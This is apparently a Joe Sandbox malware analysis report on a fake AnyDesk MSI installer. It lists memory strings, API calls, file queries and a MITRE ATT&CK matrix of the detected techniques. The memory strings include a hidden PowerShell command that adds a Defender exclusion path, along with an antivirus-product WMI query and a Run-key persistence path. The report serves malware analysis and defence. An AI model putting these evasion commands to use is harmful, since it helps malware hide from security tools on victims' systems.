Source: rundll32.exe, 00000009.00000002.401900486.0000000000FD5000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: 0oroot\SecurityCenter2root\SecurityCenterWQLSelect * From AntiVirusProductdisplayName%PROGRAMDATA%\Defaultrundll32.exe "",#1m_svc /sysWinsta0\Defaultopenrunaspowershell.exe -W Hidden -Exec Bypass Add-MpPreference -ExclusionPath "explorer.exe %LOCALAPPDATA%LocalLow\Chrome_RenderWidgetHostHWNDDirectUIHWNDClient CaptionSIBBarHostDesktopProgramsMFUMoreProgramsPaneDesktop More Programs PaneNamespaceTreeControl#32768NetUIHWNDSysTreeView32SysListView32Button#32770EditComboBoxComboBoxEx32DUIViewWndClassNameFloatNotifySinkProgmanProgram ManagerSHELLDLL_DefViewFolderViewShell_TrayWndReBarWindow32MSTaskSwWClassMSTaskListWClassSIBJumpViewDV2ControlHostDesktopDestinationList\explorer.exeSOFTWARE\Microsoft\Windows\CurrentVersion\Run39f848a1" /c () > "" 2>&1%08lx

Source: C:\Windows\Installer\MSI5344.tmp	Code function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	3_2_00007FF7AF72C098
Source: C:\Windows\Installer\MSI5344.tmp	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	3_2_00007FF7AF72BEBC
Source: C:\Windows\Installer\MSI5344.tmp	Code function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,	3_2_00007FF7AF72B664
Source: C:\Windows\Installer\MSI5344.tmp	Code function: EnumSystemLocalesW,	3_2_00007FF7AF724610
Source: C:\Windows\Installer\MSI5344.tmp	Code function: GetLocaleInfoEx,	3_2_00007FF7AF7083E0
Source: C:\Windows\Installer\MSI5344.tmp	Code function: GetLocaleInfoW,	3_2_00007FF7AF724B54
Source: C:\Windows\Installer\MSI5344.tmp	Code function: EnumSystemLocalesW,	3_2_00007FF7AF72BA80
Source: C:\Windows\Installer\MSI5344.tmp	Code function: EnumSystemLocalesW,	3_2_00007FF7AF72B9B0

Source: C:\Windows\System32\msiexec.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
1 Replication Through Removable Media	2 Native API	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	1 Disable or Modify Tools	11 Input Capture	2 System Time Discovery	1 Replication Through Removable Media	1 Archive Collected Data	Exfiltration Over Other Network Medium	2 Ingress Tool Transfer	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	1 Command and Scripting Interpreter	1 Create Account	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	LSASS Memory	11 Peripheral Device Discovery	Remote Desktop Protocol	1 Screen Capture	Exfiltration Over Bluetooth	11 Encrypted Channel	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	3 PowerShell	1 Registry Run Keys / Startup Folder	112 Process Injection	1 Obfuscated Files or Information	Security Account Manager	1 Account Discovery	SMB/Windows Admin Shares	11 Input Capture	Automated Exfiltration	2 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	1 Registry Run Keys / Startup Folder	1 Software Packing	NTDS	3 File and Directory Discovery	Distributed Component Object Model	2 Clipboard Data	Scheduled Transfer	3 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	25 System Information Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	11 File Deletion	Cached Domain Credentials	41 Security Software Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	121 Masquerading	DCSync	21 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	21 Virtualization/Sandbox Evasion	Proc Filesystem	3 Process Discovery	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	112 Process Injection	/etc/passwd and /etc/shadow	1 Application Window Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	1 Rundll32	Network Sniffing	1 System Owner/User Discovery	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact
Compromise Software Dependencies and Development Tools	Windows Command Shell	Cron	Cron	Right-to-Left Override	Input Capture	1 Remote System Discovery	Replication Through Removable Media	Remote Data Staging	Exfiltration Over Physical Medium	Mail Protocols			Service Stop

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report AnydeskSetup_26b30163.msi

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Initial Sample

Dropped Files

Sigma Signatures

Data Obfuscation

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

Protection of GUI

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Windows Analysis Report
AnydeskSetup_26b30163.msi